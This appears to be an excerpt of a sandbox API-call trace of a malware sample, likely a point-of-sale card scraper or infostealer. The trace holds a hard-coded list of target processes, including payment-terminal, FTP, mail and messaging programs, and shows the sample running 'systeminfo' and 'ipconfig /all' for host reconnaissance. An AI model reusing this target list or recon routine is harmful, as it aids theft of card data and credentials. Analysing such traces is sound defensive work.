lpWideCharStr="audiodg.exe,msfeedssync.exe,answerelectionthroughout.exe,utg2.exe,spgagentservice.exe,spcwin.exe,omnipos.exe,mxslipstream.exe,isspos.exe,fpos.exe,edcsvr.exe,creditservice.exe,centralcreditcard.exe,ccv_server.exe,aldelo.exe,afr38.exe,accupos.exe,active-charge.exe,yahoomessenger.exe,winscp.exe,whatsapp.exe,webdrive.exe,trillian.exe,thunderbird.exe,smartftp.exe,skype.exe,scriptftp.exe,pidgin.exe,outlook.exe,operamail.exe,notepad.exe,ncftp.exe,leechftp.exe,icq.exe,gmailnotifierpro.exe,foxmailincmail.exe,fling.exe,flashfxp.exe,filezilla.exe,far.exe,coreftp.exe,bitkinex.exe,barca.exe,alftp.exe,absolutetelnet.exe,3dftp.exe,though.exe,body.exe,project.exe,pressure_former.exe,coach_wait_small.exe,military.exe,various.exe,amount-bad.exe,containhowever.exe,newspapertrypositive.exe,addressseasonlow.exe,religious-wonder-win.exe,focus_wear.exe,period.exe,education process memory.exe,away.exe,my-technology.exe,beatdeal.exe,structure_indeed.exe,employee.exe,iexplore.exe,WmiPrvSE.exe,backgroundTaskHost.exe,sppsvc.exe,WMIADAP.exe,SearchUI.exe,ShellExperienceHost.exe,explorer.exe,taskhostw.exe,RuntimeBroker.exe,sihost.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,롖\⊸, cchWideChar=1219, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1219 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4c3) returned 0x254a2c0 [0117.510] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="audiodg.exe,msfeedssync.exe,answerelectionthroughout.exe,utg2.exe,spgagentservice.exe,spcwin.exe,omnipos.exe,mxslipstream.exe,isspos.exe,fpos.exe,edcsvr.exe,creditservice.exe,centralcreditcard.exe,ccv_server.exe,aldelo.exe,afr38.exe,accupos.exe,active-charge.exe,yahoomessenger.exe,winscp.exe,whatsapp.exe,webdrive.exe,trillian.exe,thunderbird.exe,smartftp.exe,skype.exe,scriptftp.exe,pidgin.exe,outlook.exe,operamail.exe,notepad.exe,ncftp.exe,leechftp.exe,icq.exe,gmailnotifierpro.exe,foxmailincmail.exe,fling.exe,flashfxp.exe,filezilla.exe,far.exe,coreftp.exe,bitkinex.exe,barca.exe,alftp.exe,absolutetelnet.exe,3dftp.exe,though.exe,body.exe,project.exe,pressure_former.exe,coach_wait_small.exe,military.exe,various.exe,amount-bad.exe,containhowever.exe,newspapertrypositive.exe,addressseasonlow.exe,religious-wonder-win.exe,focus_wear.exe,period.exe,education process memory.exe,away.exe,my-technology.exe,beatdeal.exe,structure_indeed.exe,employee.exe,iexplore.exe,WmiPrvSE.exe,backgroundTaskHost.exe,sppsvc.exe,WMIADAP.exe,SearchUI.exe,ShellExperienceHost.exe,explorer.exe,taskhostw.exe,RuntimeBroker.exe,sihost.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe,롖\⊸, cchWideChar=1219, lpMultiByteStr=0x254a2c0, cbMultiByte=1219, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe,msfeedssync.exe,answerelectionthroughout.exe,utg2.exe,spgagentservice.exe,spcwin.exe,omnipos.exe,mxslipstream.exe,isspos.exe,fpos.exe,edcsvr.exe,creditservice.exe,centralcreditcard.exe,ccv_server.exe,aldelo.exe,afr38.exe,accupos.exe,active-charge.exe,yahoomessenger.exe,winscp.exe,whatsapp.exe,webdrive.exe,trillian.exe,thunderbird.exe,smartftp.exe,skype.exe,scriptftp.exe,pidgin.exe,outlook.exe,operamail.exe,notepad.exe,ncftp.exe,leechftp.exe,icq.exe,gmailnotifierpro.exe,foxmailincmail.exe,fling.exe,flashfxp.exe,filezilla.exe,far.exe,coreftp.exe,bitkinex.exe,barca.exe,alftp.exe,absolutetelnet.exe,3dftp.exe,though.exe,body.exe,project.exe,pressure_former.exe,coach_wait_small.exe,military.exe,various.exe,amount-bad.exe,containhowever.exe,newspapertrypositive.exe,addressseasonlow.exe,religious-wonder-win.exe,focus_wear.exe,period.exe,education process memory.exe,away.exe,my-technology.exe,beatdeal.exe,structure_indeed.exe,employee.exe,iexplore.exe,WmiPrvSE.exe,backgroundTaskHost.exe,sppsvc.exe,WMIADAP.exe,SearchUI.exe,ShellExperienceHost.exe,explorer.exe,taskhostw.exe,RuntimeBroker.exe,sihost.exe,spoolsv.exe,dwm.exe,svchost.exe,lsass.exe,services.exe,winlogon.exe,wininit.exe,csrss.exe,smss.exe", lpUsedDefaultChar=0x0) returned 1219 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5cff90 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5eff00 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5f05c0 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5f0380 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5eeac0 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5f0ec0 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5f0c80 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5ef180 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536800 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535a80 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535840 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535600 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534f40 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534880 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5341c0 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.510] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534640 | out: hHeap=0x500000) returned 1 [0117.510] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533f80 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534d00 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533680 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533440 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533d40 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533200 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5365c0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536ec0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534400 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536380 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536c80 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536140 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x534ac0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535cc0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x533b00 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535180 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5353c0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x536a40 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5338c0 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x535f00 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2460310 | out: hHeap=0x500000) returned 1 [0117.511] GetProcessHeap () returned 0x500000 [0117.511] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24600d0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463d90 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24636d0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463010 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462b90 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2460e50 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462950 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461090 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2460550 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462710 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463250 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461e10 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24612d0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463b50 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461bd0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463910 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2460c10 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2463490 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24624d0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24609d0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462dd0 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461750 | out: hHeap=0x500000) returned 1 [0117.512] GetProcessHeap () returned 0x500000 [0117.512] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462290 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461510 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2460790 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2462050 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2461990 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54b740 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54d480 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54d240 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54cdc0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54c700 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54c4c0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54cb80 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54c940 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54c040 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54be00 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54bbc0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54b980 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54d000 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x54c280 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x549e40 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x591870 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x25090b0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2508e70 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.513] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x2399ea0 | out: hHeap=0x500000) returned 1 [0117.513] GetProcessHeap () returned 0x500000 [0117.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x24b8030 | out: hHeap=0x500000) returned 1 [0117.514] GetProcessHeap () returned 0x500000 [0117.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x56de40 | out: hHeap=0x500000) returned 1 [0117.514] GetProcessHeap () returned 0x500000 [0117.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23e1c30 | out: hHeap=0x500000) returned 1 [0117.514] GetProcessHeap () returned 0x500000 [0117.514] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x50df50 | out: hHeap=0x500000) returned 1 [0117.514] GetProcessHeap () returned 0x500000 [0117.514] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x23eb8f0 [0117.514] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2bff7a0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0117.514] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x2bffb30 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D1EE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\d1ee.tmp")) returned 0xd1ee [0117.518] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D1EE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\d1ee.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x2bffa88, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x61c [0117.518] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="systeminfo", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2bffac0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x61c, hStdError=0x0), lpProcessInformation=0x2bffaa0 | out: lpCommandLine="systeminfo", lpProcessInformation=0x2bffaa0*(hProcess=0x608, hThread=0x620, dwProcessId=0x11a8, dwThreadId=0x1188)) returned 1 [0117.958] WaitForSingleObject (hHandle=0x608, dwMilliseconds=0xffffffff) returned 0x0 [0122.890] CloseHandle (hObject=0x620) returned 1 [0122.890] CloseHandle (hObject=0x608) returned 1 [0122.892] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0122.892] GetFileSize (in: hFile=0x61c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x0 [0122.893] GetProcessHeap () returned 0x500000 [0122.893] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x0) returned 0x23f7ee0 [0122.893] ReadFile (in: hFile=0x61c, lpBuffer=0x23f7ee0, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2bffa74, lpOverlapped=0x0 | out: lpBuffer=0x23f7ee0*, lpNumberOfBytesRead=0x2bffa74*=0x0, lpOverlapped=0x0) returned 1 [0122.902] GetOEMCP () returned 0x1b5 [0122.902] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x0, lpMultiByteStr=0x23f7ee0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0122.902] GetProcessHeap () returned 0x500000 [0122.902] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23f7ee0 | out: hHeap=0x500000) returned 1 [0122.902] CloseHandle (hObject=0x61c) returned 1 [0122.908] DeleteFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\D1EE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\d1ee.tmp")) returned 1 [0122.910] GetProcessHeap () returned 0x500000 [0122.910] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x23eb8f0 | out: hHeap=0x500000) returned 1 [0122.910] GetProcessHeap () returned 0x500000 [0122.910] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x20) returned 0x2427cd0 [0122.911] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x2bff7a0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\") returned 0x25 [0122.911] GetTempFileNameW (in: lpPathName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x2bffb30 | out: lpTempFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\E6FE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\e6fe.tmp")) returned 0xe6fe [0122.916] CreateFileW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\E6FE.tmp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\e6fe.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x2bffa88, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x61c [0122.916] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="ipconfig /all", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2bffac0*(cb=0x68, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x61c, hStdError=0x0), lpProcessInformation=0x2bffaa0 | out: lpCommandLine="ipconfig /all", lpProcessInformation=0x2bffaa0*(hProcess=0x620, hThread=0x608, dwProcessId=0xc64, dwThreadId=0xc68)) returned 1 [0123.528] WaitForSingleObject (hHandle=0x620, dwMilliseconds=0xffffffff) returned 0x0 [0124.178] CloseHandle (hObject=0x608) returned 1 [0124.178] CloseHandle (hObject=0x620) returned 1 [0124.179] SetFilePointer (in: hFile=0x61c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.179] GetFileSize (in: hFile=0x61c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x91f [0124.179] GetProcessHeap () returned 0x500000 [0124.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x91f) returned 0x5cff90 [0124.179] ReadFile (in: hFile=0x61c, lpBuffer=0x5cff90, nNumberOfBytesToRead=0x91f, lpNumberOfBytesRead=0x2bffa74, lpOverlapped=0x0 | out: lpBuffer=0x5cff90*, lpNumberOfBytesRead=0x2bffa74*=0x91f, lpOverlapped=0x0) returned 1 [0124.179] GetOEMCP () returned 0x1b5 [0124.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x0, lpMultiByteStr=0x5cff90, cbMultiByte=2335, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 2335 [0124.179] GetProcessHeap () returned 0x500000 [0124.179] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x123e) returned 0x5edf30 [0124.179] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x0, lpMultiByteStr=0x5cff90, cbMultiByte=2335, lpWideCharStr=0x5edf30, cchWideChar=2335 | out: lpWideCharStr="\r\nWindows IP Configuration\r\n\r\n Host Name . . . . . . . . . . . . : xc64ZB\r\n Primary Dns Suffix . . . . . . . : \r\n Node Type . . . . . . . . . . . . : Hybrid\r\n IP Routing Enabled. . . . . . . . : No\r\n WINS Proxy Enabled. . . . . . . . : No\r\n\r\nEthernet adapter Ethernet 2:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Intel(R) 82574L Gigabit Network Connection #2\r\n Physical Address. . . . . . . . . : 00-22-60-79-47-15\r\n DHCP Enabled. . . . . . . . . . . : Yes\r\n Autoconfiguration Enabled . . . . : Yes\r\n Link-local IPv6 Address . . . . . : fe80::e959:2181:4fcb:adc5%6(Preferred) \r\n IPv4 Address. . . . . . . . . . . : 192.168.0.198(Preferred) \r\n Subnet Mask . . . . . . . . . . . : 255.255.255.0\r\n Lease Obtained. . . . . . . . . . : Monday, September 5, 2022 12:04:05 PM\r\n Lease Expires . . . . . . . . . . : Monday, October 10, 2022 12:22:13 AM\r\n Default Gateway . . . . . . . . . : 192.168.0.1\r\n DHCP Server . . . . . . . . . . . : 192.168.0.1\r\n DHCPv6 IAID . . . . . . . . . . . : 100667379\r\n DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-28-B6-28-5E-00-0F-F3-E1-61-38\r\n DNS Servers . . . . . . . . . . . : 192.168.0.1\r\n NetBIOS over Tcpip. . . . . . . . : Enabled\r\n\r\nTunnel adapter isatap.{E96D977E-F067-4CE9-924D-F6E0A04729E4}:\r\n\r\n Media State . . . . . . . . . . . : Media disconnected\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Microsoft ISATAP Adapter\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n\r\nTunnel adapter Local Area Connection* 3:\r\n\r\n Connection-specific DNS Suffix . : \r\n Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface\r\n Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0\r\n DHCP Enabled. . . . . . . . . . . : No\r\n Autoconfiguration Enabled . . . . : Yes\r\n IPv6 Address. . . . . . . . . . . : 2001:0:2851:782c:c8a:6208:fa6d:7b18(Preferred) \r\n Link-local IPv6 Address . . . . . : fe80::c8a:6208:fa6d:7b18%4(Preferred) \r\n Default Gateway . . . . . . . . . : ::\r\n 